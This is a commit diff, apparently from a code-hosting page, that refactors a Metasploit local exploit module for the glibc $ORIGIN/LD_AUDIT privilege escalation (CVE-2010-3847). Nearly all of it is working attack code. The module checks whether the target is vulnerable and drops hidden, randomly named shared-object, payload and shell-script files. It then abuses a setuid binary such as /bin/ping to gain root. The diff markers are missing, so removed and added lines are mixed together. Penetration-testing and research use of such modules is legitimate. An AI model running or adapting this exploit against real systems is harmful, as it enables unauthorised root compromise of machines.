Code cleanup and update style
parent
d9e7efa7e2
commit
237d3c86c4
|
@ -10,6 +10,9 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Linux::Priv
|
||||
include Msf::Post::Linux::System
|
||||
include Msf::Post::Linux::Kernel
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
include Msf::Exploit::Local::Linux
|
||||
|
@ -57,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
['Linux x86', { 'Arch' => ARCH_X86 }],
|
||||
['Linux x64', { 'Arch' => ARCH_X64 }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2010-3847'],
|
||||
|
@ -67,8 +69,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
['URL', 'https://www.ubuntu.com/usn/usn-1009-1'],
|
||||
['URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847'],
|
||||
['URL', 'https://access.redhat.com/security/cve/CVE-2010-3847']
|
||||
]
|
||||
))
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
register_options [
|
||||
OptString.new('SUID_EXECUTABLE', [true, 'Path to a suid executable', '/bin/ping'])
|
||||
]
|
||||
|
@ -86,17 +88,18 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def check
|
||||
glibc_banner = cmd_exec 'ldd --version'
|
||||
glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
|
||||
if glibc_version.eql? ''
|
||||
v = Gem::Version.new glibc_version
|
||||
if v.eql? ''
|
||||
vprint_error 'Could not determine the GNU C library version'
|
||||
return CheckCode::Safe
|
||||
elsif glibc_version >= Gem::Version.new('2.12.2') ||
|
||||
(glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12'))
|
||||
vprint_error "GNU C Library version #{glibc_version} is not vulnerable"
|
||||
end
|
||||
|
||||
if v >= Gem::Version.new('2.12.2') ||
|
||||
(v >= Gem::Version.new('2.11.3') && v < Gem::Version.new('2.12'))
|
||||
vprint_error "GNU C Library version #{v} is not vulnerable"
|
||||
return CheckCode::Safe
|
||||
end
|
||||
vprint_good "GNU C Library version #{glibc_version} is vulnerable"
|
||||
vprint_good "GNU C Library version #{v} appears vulnerable"
|
||||
|
||||
unless setuid? suid_exe_path
|
||||
vprint_error "#{suid_exe_path} is not setuid"
|
||||
|
@ -113,14 +116,18 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
CheckCode::Appears
|
||||
end
|
||||
|
||||
def upload_and_chmodx(path, data)
|
||||
def upload(path, data)
|
||||
print_status "Writing '#{path}' (#{data.size} bytes) ..."
|
||||
rm_f path
|
||||
write_file path, data
|
||||
cmd_exec "chmod +x '#{path}'"
|
||||
register_file_for_cleanup path
|
||||
end
|
||||
|
||||
def upload_and_chmodx(path, data)
|
||||
upload path, data
|
||||
chmod path
|
||||
end
|
||||
|
||||
def exploit
|
||||
check_status = check
|
||||
|
||||
|
@ -132,6 +139,14 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
if is_root?
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges'
|
||||
end
|
||||
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
suid_partition = cmd_exec "df -P -- '#{suid_exe_path}' | awk 'NR==2 {print $1}'"
|
||||
base_partition = cmd_exec "df -P -- '#{base_dir}' | awk 'NR==2 {print $1}'"
|
||||
if suid_partition == base_partition
|
||||
|
@ -140,11 +155,11 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
print_warning "'#{suid_exe_path}' and '#{base_dir}' are not located on the same partition"
|
||||
end
|
||||
|
||||
payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||
payload_name = ".#{rand_text_alphanumeric 5..10}"
|
||||
payload_path = "#{base_dir}/#{payload_name}"
|
||||
|
||||
# Set target
|
||||
uname = cmd_exec 'uname -m'
|
||||
uname = kernel_hardware
|
||||
vprint_status "System architecture is #{uname}"
|
||||
if target.name.eql? 'Automatic'
|
||||
case uname
|
||||
|
@ -195,12 +210,12 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
# Upload shared object
|
||||
so_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||
so_name = ".#{rand_text_alphanumeric 5..10}"
|
||||
so_path = "#{base_dir}/#{so_name}"
|
||||
upload_and_chmodx so_path, so
|
||||
|
||||
# Upload exploit
|
||||
link_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||
link_name = ".#{rand_text_alphanumeric 5..10}"
|
||||
link_path = "#{base_dir}/#{link_name}"
|
||||
fd = rand(10..200)
|
||||
exp = %(
|
||||
|
@ -215,7 +230,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/#{fd}
|
||||
)
|
||||
|
||||
exp_name = ".#{rand_text_alphanumeric rand(5..10)}"
|
||||
exp_name = ".#{rand_text_alphanumeric 5..10}"
|
||||
exp_path = "#{base_dir}/#{exp_name}"
|
||||
upload_and_chmodx exp_path, exp
|
||||
register_file_for_cleanup link_path
|
||||
|
|
Loading…
Reference in New Issue